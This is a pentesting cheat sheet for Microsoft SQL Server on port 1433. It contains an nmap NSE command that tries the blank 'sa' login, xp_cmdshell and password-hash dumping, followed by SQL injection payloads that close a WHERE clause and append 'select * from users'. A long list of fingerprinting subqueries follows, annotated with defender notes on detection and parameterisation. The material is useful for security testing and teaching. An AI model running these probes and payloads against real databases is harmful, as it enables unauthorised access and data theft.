1433 - Pentesting MSSQL
Enumeration
# Version probe of port 1433 plus the NSE ms-sql-* scripts, run with the
# credentials given in --script-args (login `sa`, empty password, default
# instance MSSQLSERVER). ms-sql-empty-password is the blank-sa check; the
# remaining scripts log in with those credentials, so on the server side they
# appear as `sa` logins (error 18456 on failure) in the error log / audit —
# that, and a blank or default `sa` password being accepted, is what a
# defender should alert on.
nmap -sV -p 1433 \
  --script ms-sql-info,ms-sql-empty-password,ms-sql-xp-cmdshell,ms-sql-config,ms-sql-ntlm-info,ms-sql-tables,ms-sql-hasdbaccess,ms-sql-dac,ms-sql-dump-hashes \
  --script-args mssql.instance-port=1433,mssql.username=sa,mssql.password=,mssql.instance-name=MSSQLSERVER \
  $IP
Bypass SQL WHERE clause
query
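-- bypass examples
-- Each value assumes the application concatenates it into a parenthesised
-- WHERE predicate: the value closes the predicate, appends a second statement,
-- and "--" discards the rest of the original query. SQL Server runs the whole
-- batch, so the appended SELECT executes with the application login's rights.
-- Mitigation is parameterisation (sp_executesql with @params / prepared
-- statements) plus a least-privilege application login, not filtering of
-- quotes or "--". Detection: multi-statement batches from a login that
-- normally issues single statements (Extended Events sql_batch_completed,
-- SQL Server Audit).
1=1); select * from users; -- lorem ipsum
'1'='1'); select * from users; -- lorem ipsum
2>1); select * from users; -- lorem ipsum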
Useful queries
databases
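-- tables columns
-- Column names of the 'users' table, concatenated into a single value.
-- STRING_AGG requires SQL Server 2017 or later. The original TOP 1 was
-- redundant: an aggregate without GROUP BY already yields exactly one row.
-- NOTE(review): this is scoped to msdb, a system database; application
-- tables normally live in the current database — confirm the intended target.
(SELECT STRING_AGG(CONVERT(NVARCHAR(MAX), COLUMN_NAME), ',') FROM msdb.INFORMATION_SCHEMA.COLUMNS WHERE TABLE_NAME = 'users')
-- Names of stored procedures and functions in the current database.
-- INFORMATION_SCHEMA views generally return only objects the caller has some
-- permission on, so a least-privilege application login limits what this
-- discloses.
(SELECT STRING_AGG(CONVERT(NVARCHAR(MAX), ROUTINE_NAME), ',') FROM INFORMATION_SCHEMA.ROUTINES)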
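-- Session / database context functions. Each is a scalar, so it can stand
-- alone as a parenthesised subquery; together they describe the context an
-- injected statement runs in. Such calls are typically not captured by
-- default logging, so disclosure through them is hard to reconstruct later.
(SELECT APP_NAME())            -- application name the connection declared
(SELECT DB_ID())               -- id of the current database
(SELECT DB_NAME())             -- name of the current database
(SELECT ORIGINAL_DB_NAME())    -- database requested in the connection string
(SELECT SCHEMA_ID())           -- id of the caller's default schema
(SELECT SCHEMA_NAME())         -- name of the caller's default schema
(SELECT SCOPE_IDENTITY())      -- last identity value inserted in this scope (NULL if none)
-- Fix: VERSION() is a MySQL function and is not defined in T-SQL; SQL Server
-- exposes the product/build/OS string through @@VERSION.
(SELECT @@VERSION)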
-- SERVERPROPERTY() probes, grouped by what they disclose. Each stays a
-- parenthesised scalar subquery so it can be embedded in a larger statement.
-- The values are instance metadata (build, host names, paths, enabled
-- features, authentication mode); they are what makes an instance
-- fingerprintable, so a defender should keep them out of error messages and
-- verbose APIs.

-- Version, build and edition
(SELECT SERVERPROPERTY('ProductVersion'))
(SELECT SERVERPROPERTY('ProductMajorVersion'))
(SELECT SERVERPROPERTY('ProductMinorVersion'))
(SELECT SERVERPROPERTY('ProductBuild'))
(SELECT SERVERPROPERTY('ProductBuildType'))
(SELECT SERVERPROPERTY('ProductLevel'))
(SELECT SERVERPROPERTY('ProductUpdateLevel'))
(SELECT SERVERPROPERTY('ProductUpdateReference'))
(SELECT SERVERPROPERTY('Edition'))
(SELECT SERVERPROPERTY('EditionID'))
(SELECT SERVERPROPERTY('EngineEdition'))
(SELECT SERVERPROPERTY('LicenseType'))
(SELECT SERVERPROPERTY('NumLicenses'))
(SELECT SERVERPROPERTY('BuildClrVersion'))
(SELECT SERVERPROPERTY('ResourceVersion'))
(SELECT SERVERPROPERTY('ResourceLastUpdateDateTime'))

-- Host and instance identity
(SELECT SERVERPROPERTY('ServerName'))
(SELECT SERVERPROPERTY('MachineName'))
(SELECT SERVERPROPERTY('ComputerNamePhysicalNetBIOS'))
(SELECT SERVERPROPERTY('InstanceName'))
(SELECT SERVERPROPERTY('ProcessID'))
(SELECT SERVERPROPERTY('PathSeparator'))
(SELECT SERVERPROPERTY('IsLocalDB'))
(SELECT SERVERPROPERTY('IsClustered'))

-- On-disk locations and FILESTREAM share
(SELECT SERVERPROPERTY('InstanceDefaultDataPath'))
(SELECT SERVERPROPERTY('InstanceDefaultLogPath'))
(SELECT SERVERPROPERTY('InstanceDefaultBackupPath'))
(SELECT SERVERPROPERTY('FilestreamShareName'))
(SELECT SERVERPROPERTY('FilestreamConfiguredLevel'))
(SELECT SERVERPROPERTY('FilestreamEffectiveLevel'))

-- Authentication mode and single-user state
(SELECT SERVERPROPERTY('IsIntegratedSecurityOnly'))
(SELECT SERVERPROPERTY('IsExternalAuthenticationOnly'))
(SELECT SERVERPROPERTY('IsSingleUser'))

-- High availability and optional features
(SELECT SERVERPROPERTY('IsHadrEnabled'))
(SELECT SERVERPROPERTY('HadrManagerStatus'))
(SELECT SERVERPROPERTY('IsFullTextInstalled'))
(SELECT SERVERPROPERTY('IsPolyBaseInstalled'))
(SELECT SERVERPROPERTY('IsAdvancedAnalyticsInstalled'))
(SELECT SERVERPROPERTY('IsBigDataCluster'))
(SELECT SERVERPROPERTY('IsXTPSupported'))
(SELECT SERVERPROPERTY('IsTempDbMetadataMemoryOptimized'))
(SELECT SERVERPROPERTY('IsServerSuspendedForSnapshotBackup'))
(SELECT SERVERPROPERTY('SuspendedDatabaseCount'))

-- Collation and character set
(SELECT SERVERPROPERTY('Collation'))
(SELECT SERVERPROPERTY('CollationID'))
(SELECT SERVERPROPERTY('ComparisonStyle'))
(SELECT SERVERPROPERTY('LCID'))
(SELECT SERVERPROPERTY('SqlCharSet'))
(SELECT SERVERPROPERTY('SqlCharSetName'))
(SELECT SERVERPROPERTY('SqlSortOrder'))
(SELECT SERVERPROPERTY('SqlSortOrderName'))